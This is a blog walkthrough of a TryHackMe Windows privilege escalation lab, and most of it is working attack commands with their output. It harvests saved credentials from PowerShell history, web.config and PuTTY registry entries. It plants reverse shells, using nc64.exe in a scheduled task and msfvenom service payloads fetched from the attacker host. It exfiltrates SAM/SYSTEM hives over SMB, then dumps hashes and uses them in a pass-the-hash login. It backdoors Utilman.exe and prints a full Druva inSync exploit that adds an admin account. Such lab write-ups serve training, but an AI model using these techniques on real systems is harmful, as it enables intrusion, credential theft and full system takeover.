Task 2 Windows Privilege Escalation

The weaknesses could be abused to privilege escalation:

  • Misconfigurations on Windows services or scheduled tasks
  • Excessive privileges assigned to our account
  • Vulnerable software
  • Missing Windows security patches

Question: Users that can change system configurations are part of which group?
Answer: Administrators

Question: The SYSTEM account has more privileges than the Administrator user (aye/nay)
Answer: aye

Task 3 Harvesting Passwords from Usual Spots

Question: A password for the julia.jones user has been left on the Powershell history. What is the password?
Answer: ZuperCkretPa5z

C:\Users\thm-unpriv>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
ls
whoami
whoami /priv
whoami /group
whoami /groups
cmdkey /?
cmdkey /add:thmdc.local /user:julia.jones /pass:ZuperCkretPa5z
cmdkey /list
cmdkey /delete:thmdc.local
cmdkey /list
runas /?
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cd c:\
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Question: A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
Answer: 098n0x35skjD3

C:\Users\thm-unpriv>type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
                <add connectionStringName="LocalSqlServer" maxEventDetailsLength="1073741823" buffer="false" bufferMode="Notification" name="SqlWebEventProvider" type="System.Web.Management.SqlWebEventProvider,System.Web,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a" />
                    <add connectionStringName="LocalSqlServer" name="AspNetSqlPersonalizationProvider" type="System.Web.UI.WebControls.WebParts.SqlPersonalizationProvider, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
    <connectionStrings>
        <add connectionString="Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3" name="THM-DB" />
    </connectionStrings>

Question: There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Answer: THM{WHAT_IS_MY_PASSWORD}

C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv

C:\Users\thm-unpriv>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=WPRIVESC1\mike.katz
    Type: Domain Password
    User: WPRIVESC1\mike.katz

C:\Users\thm-unpriv>runas /savecred /user:mike.katz cmd.exe
Attempting to start cmd.exe as user "WPRIVESC1\mike.katz" ...

Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wprivesc1\mike.katz

C:\Windows\system32>dir C:\Users\mike.katz\Desktop
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\mike.katz\Desktop

05/04/2022  05:17 AM    <DIR>          .
05/04/2022  05:17 AM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
05/04/2022  05:17 AM                24 flag.txt
               3 File(s)          1,105 bytes
               2 Dir(s)  14,820,655,104 bytes free

C:\Windows\system32>type C:\Users\mike.katz\Desktop\flag.txt
THM{WHAT_IS_MY_PASSWORD}

Question: Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
Answer: CoolPass2021

C:\Users\thm-unpriv>reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\My%20ssh%20server
    ProxyExcludeList    REG_SZ
    ProxyDNS    REG_DWORD    0x1
    ProxyLocalhost    REG_DWORD    0x0
    ProxyMethod    REG_DWORD    0x0
    ProxyHost    REG_SZ    proxy
    ProxyPort    REG_DWORD    0x50
    ProxyUsername    REG_SZ    thom.smith
    ProxyPassword    REG_SZ    CoolPass2021
    ProxyTelnetCommand    REG_SZ    connect %host %port\n
    ProxyLogToTerm    REG_DWORD    0x1

End of search: 10 match(es) found.

Task 4 Other Quick Wins

Question: What is the taskusr1 flag?
Answer: THM{TASK_COMPLETED}

First of all, check scheduled tasks with the schtask command:

C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv

C:\Users\thm-unpriv>schtasks | findstr "vuln"
vulntask                                 N/A                    Ready

C:\Users\thm-unpriv> schtasks /query /tn vulntask /fo list /v

Folder: \
HostName:                             WPRIVESC1
TaskName:                             \vulntask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        9/20/2023 4:50:15 PM
Last Result:                          0
Author:                               WPRIVESC1\Administrator
Task To Run:                          C:\tasks\schtask.bat
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          taskusr1
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

C:\Users\thm-unpriv>echo c:\tools\nc64.exe -e cmd.exe 10.11.52.229 4444 > C:\tasks\schtask.bat

The "Task to Run" parameter is C:\tasks\schtask.bat, we could modify the .bat file and insert any payload to spawn a reverse shell, here I've used C:\tools\nc64.exe.

Then start a listener on the attacker machine:

nc -lvnp 4444

Start the task manually:

C:\Users\thm-unpriv>schtasks /run /tn vulntask
SUCCESS: Attempted to run the scheduled task "vulntask".

Receive the reverse shell with taskusr1 privileges as expected:

❯ ncat -lvnp 4444
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.201.216:49789.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
wprivesc1\taskusr1

C:\Windows\system32>dir C:\Users\taskusr1\Desktop\
dir C:\Users\taskusr1\Desktop\
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\taskusr1\Desktop

05/03/2022  01:00 PM    <DIR>          .
05/03/2022  01:00 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
05/03/2022  01:00 PM                19 flag.txt
               3 File(s)          1,100 bytes
               2 Dir(s)  15,015,317,504 bytes free

C:\Windows\system32>type C:\Users\taskusr1\Desktop\flag.txt
type C:\Users\taskusr1\Desktop\flag.txt
THM{TASK_COMPLETED}

Task 5 Abusing Service Misconfigurations

Insecure Permissions on Service Executable

Question: Get the flag on svcusr1's desktop.

Check the service properties and permissions:

C:\Users\thm-unpriv>sc qc windowsscheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: windowsscheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\PROGRA~2\SYSTEM~1\WService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Scheduler Service
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcusr1

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

The service installed by the vulnerable software runs as svcusr1 and the executable associated with the service is in C:\Progra~2\System~1\WService.exe. Also, the Everyone group has modify permissions (M) on the service's executable.

This means I could simply overwrite it with any payload of my preference, and the service will execute it with the privileges of the configured user account(svcusr1).

Generate an exe-service payload using msfvenom and serve it through a python webserver:

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.52.229 LPORT=22002 -f exe-service -o rev-svc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe-service file: 48640 bytes
Saved as: rev-svc.exe

❯ python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...

Then just pull the payload through PowerShell, and replace the service executable with it:

PS C:\Users\thm-unpriv> wget http://10.11.52.229/rev-svc.exe -O rev-svc.exe
PS C:\Users\thm-unpriv>move C:\PROGRA~2\SYSTEM~1\WService.exe C:\PROGRA~2\SYSTEM~1\WService.exe.bak
        1 file(s) moved.

PS C:\Users\thm-unpriv>move rev-svc.exe C:\PROGRA~2\SYSTEM~1\WService.exe
        1 file(s) moved.

Grant full permissions to the Everyone group:

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe NT AUTHORITY\SYSTEM:(F)
                                  BUILTIN\Administrators:(F)
                                  WPRIVESC1\thm-unpriv:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe /grant Everyone:F
processed file: C:\PROGRA~2\SYSTEM~1\WService.exe
Successfully processed 1 files; Failed processing 0 files

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
                                  NT AUTHORITY\SYSTEM:(F)
                                  BUILTIN\Administrators:(F)
                                  WPRIVESC1\thm-unpriv:(F)
                                  Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
                                  WPRIVESC1\thm-unpriv:(I)(F)
                                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Start nc on attack machine and restart the service on the target:

C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler
❯ ncat -lvnp 22002
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22002
Ncat: Listening on 0.0.0.0:22002
Ncat: Connection from 10.10.2.92:49853.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
wprivesc1\svcusr1

C:\Windows\system32>type C:\Users\svcusr1\Desktop\flag.txt
type C:\Users\svcusr1\Desktop\flag.txt
THM{AT_YOUR_SERVICE}

Answer: THM{AT_YOUR_SERVICE}

Unquoted Service Paths

Question: Get the flag on svcusr2's desktop.

Regenerate an exe-service payload, upload it again and start a listener on attack machine.

Find a service without proper quotation:

PS C:\Users\thm-unpriv\Desktop> sc.exe qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcusr2

Move the payload to C:\MyPrograms\Disk.exe and grant it with Everyone full permissions. Then just restart the service so I could recive the reverse shell.

PS C:\Users\thm-unpriv\Desktop> move .\svc2.exe C:\MyPrograms\Disk.exe
PS C:\Users\thm-unpriv\Desktop> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
processed file: C:\MyPrograms\Disk.exe
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\thm-unpriv\Desktop> sc.exe stop "disk sorter enterprise"
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\Users\thm-unpriv\Desktop> sc.exe start "disk sorter enterprise"

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 4932
        FLAGS              :
❯ ncat -lvnp 22003
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22003
Ncat: Listening on 0.0.0.0:22003
Ncat: Connection from 10.10.2.92:49900.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
wprivesc1\svcusr2

C:\Windows\system32>type C:\Users\svcusr2\Desktop\flag.txt
type C:\Users\svcusr2\Desktop\flag.txt
THM{QUOTES_EVERYWHERE}
C:\Windows\system32>

Answer: THM{QUOTES_EVERYWHERE}

Insecure Service Permissions

Question: Get the flag on the Administrator's desktop.

Use Accesschk64.exe from the sysinternals suite to view the DACL (Discretionary Access Control Lists) on the thmservice:

PS C:\Users\thm-unpriv\Desktop> cd C:\tools\AccessChk\
PS C:\tools\AccessChk> .\accesschk64.exe -qlc thmservice

Accesschk v6.14 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

thmservice
  DESCRIPTOR FLAGS:
      [SE_DACL_PRESENT]
      [SE_SACL_PRESENT]
      [SE_SELF_RELATIVE]
  OWNER: NT AUTHORITY\SYSTEM
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [1] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  [2] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\INTERACTIVE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [3] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SERVICE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS

Here we can see that the BUILTIN\\Users group has the SERVICE_ALL_ACCESS permission, which means any user can reconfigure the service.

Regenerate an exe-service payload, upload it again and start a listener on attack machine. Also, grant the payload with Everyone full permissions.

PS C:\tools\AccessChk> cd C:\Users\thm-unpriv\Desktop
PS C:\Users\thm-unpriv\Desktop> wget http://10.11.52.229/svc3.exe -O svc3.exe
PS C:\Users\thm-unpriv\Desktop> ls

    Directory: C:\Users\thm-unpriv\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/4/2022   8:15 AM           1387 ProcessHacker.lnk
-a----        9/23/2023   7:19 AM          48640 svc3.exe

PS C:\Users\thm-unpriv\Desktop> icacls .\svc3.exe /grant Everyone:F
processed file: .\svc3.exe
Successfully processed 1 files; Failed processing 0 files

Reconfigure the vulnerable "thmservice" and restart it:

PS C:\Users\thm-unpriv\Desktop> sc.exe config THMService binPath= "C:\Users\thm-unpriv\Desktop\svc3.exe" obj= LocalSystem
[SC] ChangeServiceConfig SUCCESS
PS C:\Users\thm-unpriv\Desktop> sc.exe start THMService

SERVICE_NAME: THMService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 756
        FLAGS              :
❯ ncat -lvnp 22004
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22004
Ncat: Listening on 0.0.0.0:22004
Ncat: Connection from 10.10.2.92:49908.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt
type C:\Users\Administrator\Desktop\flag.txt
THM{INSECURE_SVC_CONFIG}
C:\Windows\system32>

Answer: THM{INSECURE_SVC_CONFIG}

Task 6 Abusing dangerous privileges

Question: Get the flag on the Administrator's desktop.

SeBackup / SeRestore

Check the privileges one the target(open a command prompt with the "Open as administrator" option):

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

In order to be able to copy files from the target machine to the attack machine, I'd like to use impacket's smbserver.py (could be installed with pip install impacket) to start a simple SMB server with a network share:

❯ mkdir share
❯ smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B32****EE188 V:3.0
[*] Callback added for UUID 6BFF****E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Then backup the SAM and SYSTEM hashes on the target machine, and copy these files to the attack machine.

PS C:\Windows\system32> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.
PS C:\Windows\system32> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.
PS C:\Windows\system32> copy C:\Users\THMBackup\sam.hive \\10.11.52.229\public\
PS C:\Windows\system32> copy C:\Users\THMBackup\system.hive \\10.11.52.229\public\

We can now use impacket to get administrator's hash:

❯ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
THMBackup:1008:aad3b435b51404eeaad3b435b51404ee:6c252027fb2022f5051e854e08023537:::
THMTakeOwnership:1009:aad3b435b51404eeaad3b435b51404ee:0af9b65477395b680b822e0b2c45b93b:::
[*] Cleaning up...

Finally, we can use the impacket with the Administrator's hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges:

❯ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 [email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.47.4.....
[*] Found writable share ADMIN$
[*] Uploading file NvvXZONf.exe
[*] Opening SVCManager on 10.10.47.4.....
[*] Creating service uteZ on 10.10.47.4.....
[*] Starting service uteZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\flag.txt
THM{SEFLAGPRIVILEGE}
C:\Windows\system32>

Answer: THM{SEFLAGPRIVILEGE}

SeTakeOwnership

Check the privileges one the target(open a command prompt with the "Open as administrator" option):

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Disabled

We can also abuse utilman.exe to escalate privileges in this case.

First let's take ownership on utilman.exe and grant us full permission:

PS C:\Windows\system32> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WPRIVESC2\THMTakeOwnership".

PS C:\Windows\system32> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: C:\Windows\System32\Utilman.exe
Successfully processed 1 files; Failed processing 0 files

PS C:\Windows\system32>

Then just replace utilman.exe with a copy of cmd.exe:

PS C:\Windows\system32> copy cmd.exe Utilman.exe

Wew can now trigger utilman.exe from locking the session and clicking the ease of access button to get the system shell :

Task 7 Abusing vulnerable software

Question: Get the flag on the Administrator's desktop.

Druva inSync 6.6.3 exploit code exp.ps1:

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command) 

This exp will create user pwnd with a password of SimplePass123 and add it to the administrators' group.

After executing this in powershell, we could check the membership of our new added user:

PS C:\tools> .\Druva_inSync_exploit.ps1
22
4
4
280
PS C:\tools> net user pwnd
User name                    pwnd
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/23/2023 8:44:56 AM
Password expires             11/4/2023 8:44:56 AM
Password changeable          9/23/2023 8:44:56 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.

Use the following commands to change the user:

PS C:\tools> Start-Process powershell -Verb runAs

PS C:\Windows\system32> whoami
wprivesc3\pwnd
PS C:\Windows\system32> type c:\users\administrator\desktop\flag.txt
THM{EZ_DLL_PROXY_4ME}
PS C:\Windows\system32>

Answer: THM{EZ_DLL_PROXY_4ME}

Task 8 Tools of the Trade

WinPEAS

project link:
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

C:\tools> winpeas.exe > outputfile.txt

PrivescCheck

project link:
https://github.com/itm4n/PrivescCheck

cmd:
C:\tools> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"

powershell:
PS C:\tools> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\tools> . .\PrivescCheck.ps1
PS C:\tools> Invoke-PrivescCheck -Extended -Report "PrivescCheck_$($env:COMPUTERNAME)"

Metasploit

If you already have a Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on the target system.

文章作者: z0sen
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 z0sen's Blog
TryHackMe RedTeam
喜欢就支持一下吧